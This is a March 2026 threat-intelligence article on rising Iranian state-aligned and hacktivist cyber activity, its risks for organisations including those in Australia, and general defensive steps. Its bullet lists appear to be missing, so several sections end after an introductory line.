March 2026
Recent geopolitical tensions involving Iran have triggered a noticeable shift in the cyber security threat landscape. Intelligence from multiple security communities and national cyber authorities indicates that cyber activity linked to Iranian state-aligned actors and proxy groups is increasing.
While the majority of activity currently appears focused on geopolitical targets in the Middle East and allied nations, the global nature of cyber operations means organisations worldwide- including those in Australia -should remain vigilant. Periods of geopolitical instability have historically been accompanied by spikes in cyber espionage, disruptive attacks, and hacktivist campaigns.
This article explores recent activity, the risks posed to organisations, and practical steps to strengthen cyber resilience.
Iran maintains one of the most active and diverse cyber ecosystems globally, combining state-sponsored intelligence operations with loosely affiliated hacktivist groups. These actors conduct a mix of espionage, disruption, and influence operations aligned with geopolitical objectives.
Recent intelligence highlights activity across several well-known threat groups, including:
Alongside these state-aligned actors, Iranian cyber strategy frequently leverages hacktivist proxy groups to conduct disruptive or deniable operations. Groups such as Cyber Av3ngers, Handala, DieNet, and the Fatimion Cyber Team have conducted activities ranging from website defacements and DDoS attacks to intrusions into industrial control systems and surveillance infrastructure.
These groups often coordinate activity during periods of geopolitical tension to amplify disruption and influence operations.
Recent threat intelligence also highlights how Iranian-aligned groups are evolving their operational techniques.
One recent espionage campaign targeted government officials using advanced social engineering combined with custom malware. The operation deployed previously unseen .NET-based malware families designed for stealthy persistence and command-and-control communications.
Several notable tactics stood out:
Evidence suggests generative AI was used during malware development, enabling attackers to rapidly produce customised payloads and iterate tools more quickly than traditional development cycles.
Attackers tricked victims into manually executing malicious PowerShell commands by instructing them to “fix browser errors” or join fake collaboration sessions. This approach bypasses many automated security controls because the victim performs the action themselves.
Custom malware included techniques such as hidden Windows forms and delayed communications designed to evade sandbox analysis and automated detection.
These developments demonstrate how threat actors are blending advanced malware with human-centric exploitation techniques to increase success rates.
Iranian cyber operations have evolved beyond traditional espionage and defacement campaigns. Security researchers increasingly describe their approach as “influence-driven disruption”
In these campaigns, attackers:
This tactic - commonly referred to as “hack-and-leak” operations - combines technical compromise with psychological and reputational impact.
Additionally, Iranian actors are increasingly targeting:
These strategies allow attackers to reach larger numbers of victims through supply chain compromise or infrastructure disruption.
The Australian Cyber Security Centre (ACSC) has advised that while there is currently no specific evidence of increased targeting of Australia, the evolving geopolitical environment increases the likelihood of opportunistic cyber activity.
Organisations with the following exposure should be particularly alert:
Even when attacks are not directly targeted, organisations may still be impacted through:
Global cyber operations rarely remain contained to a single region.
Given the tactics commonly used by Iranian-aligned actors, organisations should consider strengthening several core defensive controls.
Many campaigns rely on credential theft or password spraying.
Recommended measures include:
Iranian groups frequently exploit known vulnerabilities in edge devices.
Organisations should:
Modern campaigns increasingly target collaboration platforms such as:
Security awareness training should extend beyond email phishing to include multi-channel social engineering.
Industrial systems and smart devices can provide attackers with both operational access and intelligence gathering capabilities.
Best practices include:
Hacktivist groups often launch nuisance or disruptive campaigns during geopolitical crises.
Organisations should:
Cyber operations have become a central component of modern geopolitical competition. Nation-state actors increasingly blend espionage, disruption, and influence campaigns to achieve strategic objectives without direct military engagement.
For organisations, this means cyber risk can escalate rapidly in response to international events.
While not every organisation will be directly targeted, any organisation connected to global digital infrastructure can become part of the attack surface.
The most resilient organisations focus on three principles:
In an environment where cyber threats increasingly mirror geopolitical tensions, preparedness and resilience are essential.